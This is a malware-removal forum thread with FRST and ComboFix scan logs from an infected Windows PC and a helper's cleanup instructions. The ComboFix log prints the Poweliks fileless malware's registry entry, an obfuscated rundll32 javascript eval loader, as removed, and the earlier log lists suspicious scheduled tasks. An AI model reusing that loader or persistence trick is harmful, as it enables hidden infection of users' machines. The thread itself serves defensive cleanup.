Task: {1CC81347-6204-4B83-900C-01E02F50F067} - System32\Tasks\Microsoft\Windows\MobilePC\TMM
Task: {1D455FF0-01E6-438C-A9D6-27C72AC03552} - \PC Performer No Task File <==== ATTENTION
Task: {219889BA-90E3-4298-B815-4C452D260575} - System32\Tasks\AdobeFlashPlayerUpdate => C:\Windows\system32\FlashPlayerUpdateService.exe
Task: {2343967C-C69F-44DE-8AA3-E9113A3466E5} - System32\Tasks\Security Center Update - 754758581 => C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu\hyidd.exe
Task: {239D58F4-E8C7-48B2-A92C-0C20674542F1} - System32\Tasks\The Bluetooth service discovery => C:\Windows\system32\Drivers\blds.exe
Task: {28940D65-5F6A-439A-B94B-EA3ECA5F5756} - System32\Tasks\Microsoft\Microsoft Antimalware\MP Scheduled Scan => c:\Program Files\Microsoft Security Client\Antimalware\MpCmdRun.exe [2011-04-27] (Microsoft Corporation)
Task: {29F51FCF-C86F-4A73-A53D-79BCBC7A3C26} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-04-17] (Piriform Ltd)
Task: {2BA5B600-850D-4223-A601-8879523AF452} - System32\Tasks\Microsoft\Windows\Tcpip\WSHReset => C:\Windows\system32\netsh.exe [2006-11-02] (Microsoft Corporation)
Task: {30B9F70E-3CAE-49C3-9D96-BE89B7AA59AB} - System32\Tasks\Time Trigger Test Task => Rundll32.exe "C:\Users\SAVAS~1.KYR\AppData\Local\Temp\xujxyvl.dll",DllRegisterServer
Task: {320124A7-D70F-41DE-A9D1-D5E8E19D5D91} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UI
Task: {3844EB23-D7D9-42B5-8061-C5A6B5F42FE0} - System32\Tasks\DriverUpdate Daily Scan => C:\Program Files\DriverUpdate\DriverUpdate.exe
Task: {3BCDF251-CA5C-4045-A1FC-8FCEF9FBDC93} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPages
Task: {44980BEE-7809-44A9-AC24-D6E578A3B7DF} - System32\Tasks\Microsoft\Windows\RAC\RACAgent => C:\Windows\system32\RacAgent.exe [2008-01-20] (Microsoft Corporation)
Task: {44E2A9D0-91BC-474D-8776-1068F7A8A6C6} - System32\Tasks\AdobeFlashPlayerUpdate 2 => C:\Windows\system32\FlashPlayerUpdateService.exe
Task: {4512337B-4691-4F43-9FBB-0095C346DDE6} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {510F6543-BD19-48A5-9E5E-D5E371879760} - System32\Tasks\AVG\PC Tuneup 2011\Integrator\Start On Rita Logon => C:\Program Files\AVG\AVG PC Tuneup 2011\BoostSpeed.exe
Task: {63809C38-FE18-4A88-92FF-44D0365CAFA2} - System32\Tasks\GlaryInitialize 5 => C:\Program Files\Glary Utilities 5\Initialize.exe [2014-08-17] (Glarysoft Ltd)
Task: {788B04FA-AA4F-4BCC-9AAE-A2881E7E64E6} - \Scheduled Update for Ask Toolbar No Task File <==== ATTENTION
Task: {C22BB22A-70B9-4AEA-B6E6-2234A457F078} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - savas.kyriakidis) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
Task: {DD48E073-3A6C-4D31-8602-D1B57F4180B5} - System32\Tasks\RtlNICDiagVistaStart => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe [2008-03-06] (Realtek)
Task: {E14F36AE-800F-4A81-94F3-BFD7740E1952} - System32\Tasks\Apple Diagnostics => C:\Program Files\Common Files\Apple\Internet Services\EReporter.exe [2013-10-31] (Apple Inc.)
Task: {E5150B95-F9B4-4D5D-95A2-7EC1ACBA95F8} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\Windows\system32\gatherWirelessInfo.vbs [2008-01-20] ()
Task: {FCAFF07B-D3AC-4A0C-A6E2-6C23DFC270C9} - System32\Tasks\{B7983C11-5FD9-12B1-4EAA-DE223F2AD5D5} => C:\Windows\system32\jsllnzn.dll/s "C:\Windows\system32\jsllnzn.dll"

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\GlaryInitialize 5.job => C:\Program Files\Glary Utilities 5\Initialize.exe
Task: C:\Windows\Tasks\RtlNICDiagVistaStart.job => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe

==================== Loaded Modules (whitelisted) =============

2014-07-31 12:16 - 2014-07-31 12:16 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2014-07-31 12:16 - 2014-07-31 12:16 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2012-03-23 14:25 - 2012-03-23 14:25 - 00087040 _____ () C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
2012-05-16 21:52 - 2010-08-04 14:44 - 00266240 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe
2012-05-16 21:52 - 2010-03-10 14:50 - 00360448 _____ () C:\Program Files\NETGEAR\WNA1100\WifiLib.dll
2011-10-13 03:28 - 2011-10-13 03:28 - 00223744 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\VistaBridgeLibrary\5d71f5ae06ea0338fa4e266ac77cf988\VistaBridgeLibrary.ni.dll
2013-09-14 01:51 - 2013-09-14 01:51 - 00087952 _____ () C:\Program Files\Common Files\Apple\Internet Services\zlib1.dll
2013-09-14 01:50 - 2013-09-14 01:50 - 01242952 _____ () C:\Program Files\Common Files\Apple\Internet Services\libxml2.dll
2014-08-20 18:08 - 2014-08-20 18:06 - 00325632 _____ () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll
2012-05-16 21:52 - 2011-01-04 15:34 - 04545024 _____ () C:\Program Files\NETGEAR\WNA1100\WNA1100.exe
2012-05-16 21:52 - 2009-08-28 16:50 - 00282624 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvcLib.dll
2014-08-17 21:06 - 2014-08-17 21:06 - 00080160 _____ () C:\Program Files\Glary Utilities 5\zlib1.dll
2014-08-23 17:21 - 2014-08-23 17:21 - 08537928 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\pdf.dll
2014-08-23 17:21 - 2014-08-23 17:21 - 00353096 _____ ()
C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\ppGoogleNaClPluginChrome.dll2014-08-23 17:21 - 2014-08-23 17:21 - 01732936 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\ffmpegsumo.dll ==================== Alternate Data Streams (whitelisted) ========= (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.) AlternateDataStreams: C:\ProgramData\TEMP:0B4227B4AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2 ==================== Safe Mode (whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) ==================== EXE Association (whitelisted) ============= (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.) ==================== MSCONFIG/TASK MANAGER disabled items ========= (Currently there is no automatic fix for this section.) ==================== Faulty Device Manager Devices ============= Name: Microsoft 6to4 Adapter #2Description: Microsoft 6to4 AdapterClass Guid: {4d36e972-e325-11ce-bfc1-08002be10318}Manufacturer: MicrosoftService: tunnelProblem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)Resolution: Update the driver Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. 
(Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet 1022nDescription: HP LaserJet 1022nClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: Deskjet 6940 seriesDescription: Deskjet 6940 seriesClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: HPService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. 
Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: hp LaserJet 2420Description: hp LaserJet 2420Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: Deskjet 6980 seriesDescription: Deskjet 6980 seriesClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: HPService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: Deskjet 6980 seriesDescription: Deskjet 6980 seriesClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: HPService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". 
This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet P2035nDescription: HP LaserJet P2035nClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet CP1025nwDescription: HP LaserJet CP1025nwClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP Color LaserJet CP2025dnDescription: HP Color LaserJet CP2025dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet P2035nDescription: HP LaserJet P2035nClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. 
(Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet 200 color M251nwDescription: HP LaserJet 200 color M251nwClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP Color LaserJet CP2025dnDescription: HP Color LaserJet CP2025dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. ==================== Event log errors: ========================= Application errors:==================Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\FIL\MESSAGES.JSON> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_24331\CRX_INSTALL\48.PNG> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_24331\CRX_INSTALL\32.PNG> in the hash map cannot be updated. 
Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\FI\MESSAGES.JSON> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_24331\CRX_INSTALL\16.PNG> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_24331\CRX_INSTALL\128.PNG> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\ET\MESSAGES.JSON> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\ES_419\MESSAGES.JSON> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. 
(0x8007001f) Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\ES\MESSAGES.JSON> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\EN_US\MESSAGES.JSON> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) System errors:=============Error: (08/25/2014 09:53:10 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC) Error: (08/25/2014 09:41:01 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC) Error: (08/25/2014 09:31:53 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC) Error: (08/25/2014 09:21:25 AM) (Source: DCOM) (EventID: 10010) (User: )Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (08/25/2014 09:20:08 AM) (Source: Service Control Manager) (EventID: 7024) (User: )Description: KtmRm for Distributed Transaction Coordinator2147942438 (0x80070026) Error: (08/25/2014 09:18:52 AM) (Source: Service Control Manager) (EventID: 
7026) (User: )Description: AVGIDSDriverAVGIDSShim Error: (08/25/2014 09:18:51 AM) (Source: Service Control Manager) (EventID: 7000) (User: )Description: vToolbarUpdater%%2 Error: (08/25/2014 09:18:51 AM) (Source: Service Control Manager) (EventID: 7001) (User: )Description: AVGIDSAgentAVGIDSDriver%%31 Error: (08/25/2014 08:23:12 AM) (Source: DCOM) (EventID: 10010) (User: )Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (08/25/2014 08:19:07 AM) (Source: Service Control Manager) (EventID: 7024) (User: )Description: KtmRm for Distributed Transaction Coordinator2147942438 (0x80070026) Microsoft Office Sessions:=========================Error: (08/14/2012 04:50:33 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )Description: ID: 3, Application Name: Microsoft Office PowerPoint, Application Version: 12.0.6600.1000, Microsoft Office Version: 12.0.6425.1000. This session lasted 228 seconds with 60 seconds of active time. This session ended with a crash. Error: (12/21/2010 06:24:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 61 seconds with 60 seconds of active time. This session ended with a crash. Error: (10/09/2010 05:15:00 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6541.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 19 seconds with 0 seconds of active time. This session ended with a crash. Error: (03/25/2010 00:21:12 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6504.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 60 seconds with 0 seconds of active time. This session ended with a crash. 
CodeIntegrity Errors:=================================== Date: 2014-08-25 09:48:31.237 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 09:48:31.054 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 09:48:30.886 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 09:48:30.700 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 09:48:30.286 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 09:48:30.009 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 09:48:29.734 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. 
Date: 2014-08-25 09:48:29.432
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-25 09:47:50.973
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-25 09:47:50.762
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Processor: Intel® Core2 Duo CPU E4600 @ 2.40GHz
Percentage of memory in use: 65%
Total physical RAM: 3060.46 MB
Available physical RAM: 1043.32 MB
Total Pagefile: 6355.21 MB
Available Pagefile: 4190.75 MB
Total Virtual: 2047.88 MB
Available Virtual: 1907.04 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:450.71 GB) (Free:221.74 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (RECOVERY) (Fixed) (Total:15 GB) (Free:10.55 GB) NTFS
Drive g: (IT Drive) (Fixed) (Total:465.76 GB) (Free:188.98 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 10000000)
Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)
Partition 2: (Not Active) - (Size=15 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=450.7 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 465.8 GB) (Disk ID: BADAE880)
Partition 1: (Active) - (Size=465.8 GB) - (Type=07 NTFS)

==================== End Of Log ============================
Naathim Posted August 25, 2014 ID:871055

ComboFix failed to delete the infection, probably due to SpyBot working in the background. I recommend uninstalling it, as this program is too weak for today's security expectations.
Also delete your version of ComboFix (simply move it to your Recycle Bin) and obtain a fresh one from the provided link before the next scan.

SpyBot S&D Warning
MVPS.org is no longer recommending SpyBot S&D due to very poor testing results (scroll down and read under Freeware Antispyware Products).
My advice is to get rid of this program. To do so:
Press the Windows key + R on your keyboard at the same time. Type appwiz.cpl and click OK.
Search for SpyBot, right-click the entry and click Uninstall.
Please do it, because it may hinder the removals.

Scan with ComboFix
This is a very powerful tool that should be used only if advised by a Malware Analyst.
Do not run ComboFix on your own!
Referring to this instruction, please download ComboFix by sUBs and save it to your desktop.
Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.
If you are a user of CD emulation software (like Daemon Tools or Alcohol), also disable it for the cleaning process - instructions here.
Right-click on the icon and select Run as Administrator to start the tool.
Accept the disclaimer and agree if prompted to install Recovery Console.
Do not take any actions while ComboFix goes through your system - it may cause it to stall!
This scan may take some time!
When finished, it will display a logfile (located also on your main drive, usually C:\ComboFix.txt).
Include that log in your next reply.

If you encounter any issues with your internet connection after running ComboFix, please visit this link.
If an error about an operation on a key marked for deletion appears after running the tool, please reboot your machine.
Don't forget to re-enable your previously switched-off protection software!
jjoyner1985 Posted August 25, 2014 Author ID:871058

Programs and Features does not show a Spybot entry. I have also looked for it in the Start Menu as well as C:\Program Files. There are no references to Spybot in either of these locations either. Since this is a 32-bit OS, there is no Program Files (x86). So, no need to look for Spybot there. Any recommendations?

jjoyner1985 Posted August 25, 2014 Author ID:871063

Wait. I see it now. It was the portable version. So, I'm going to clean it out and try the scans again...

Naathim Posted August 25, 2014 ID:871064
jjoyner1985 Posted August 25, 2014 Author ID:871071

Here we go. Combofix log:

ComboFix 14-08-24.01 - savas.kyriakidis 08/25/2014 10:55:04.4.2 - x86
Running from: G:\ComboFix.exe
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct:
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
<NO NAME> REG_SZ Thumbnail Cache Class Factory for Out of Proc Server
AppID REG_SZ {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
<NO NAME> REG_EXPAND_SZ %SYSTEMROOT%\system32\thumbcache.dll
ThreadingModel REG_SZ Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
<NO NAME> REG_SZ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
a REG_SZ [encoded script blob omitted]
.
((((((((((((((((((((((((( Files Created 
from 2014-07-25 to 2014-08-25 )))))))))))))))))))))))))))))))
.
.
2014-08-25 15:07 . 2014-08-25 15:07 -------- d-----w- c:\users\Rita\AppData\Local\temp
2014-08-25 15:07 . 2014-08-25 15:07 -------- d-----w- c:\users\Guest\AppData\Local\temp
2014-08-25 15:07 . 2014-08-25 15:07 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-08-23 20:54 . 2014-08-25 13:55 -------- d-----w- C:\FRST
2014-08-23 20:30 . 2014-08-25 13:35 110296 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-08-23 20:30 . 2014-08-25 12:26 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-08-23 20:30 . 2014-05-12 11:26 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-08-23 20:30 . 2014-05-12 11:25 74456 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-08-23 20:30 . 2014-05-12 11:25 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-08-23 20:16 . 2014-08-25 15:08 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\temp
2014-08-23 15:51 . 2014-08-23 15:53 -------- d-----w- C:\AdwCleaner
2014-08-23 15:42 . 2014-08-23 15:42 -------- d-----w- c:\windows\ERUNT
2014-08-22 21:06 . 2013-09-04 18:57 24040 ----a-w- c:\windows\system32\drivers\gfiutil.sys
2014-08-22 21:06 . 2013-05-23 12:39 43368 ----a-w- c:\windows\system32\drivers\gfiark.sys
2014-08-22 21:05 . 2014-08-23 01:40 -------- d-----w- C:\VIPRERESCUE
2014-08-22 21:05 . 2014-08-22 21:05 -------- d-----w- C:\EEK
2014-08-22 18:00 . 2014-08-23 20:48 -------- d-----w- c:\programdata\HitmanPro
2014-08-22 17:41 . 2014-08-22 17:41 -------- d-----w- c:\programdata\DameWare Development
2014-08-22 17:41 . 2014-08-22 17:54 -------- d-----w- c:\windows\dwrcs
2014-08-20 23:17 . 2014-08-20 23:17 319456 ----a-w- c:\windows\DIFxAPI.dll
2014-08-20 22:12 . 2014-08-19 22:12 75264 ----a-w- c:\windows\system32\drivers\dfsc.sys
2014-08-20 22:08 . 2014-08-20 22:08 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-20 03:07 . 2014-08-20 03:07 -------- d-----w- c:\programdata\GlarySoft
2014-08-16 21:57 . 2014-08-17 21:23 -------- d-----w- c:\programdata\AVG2014
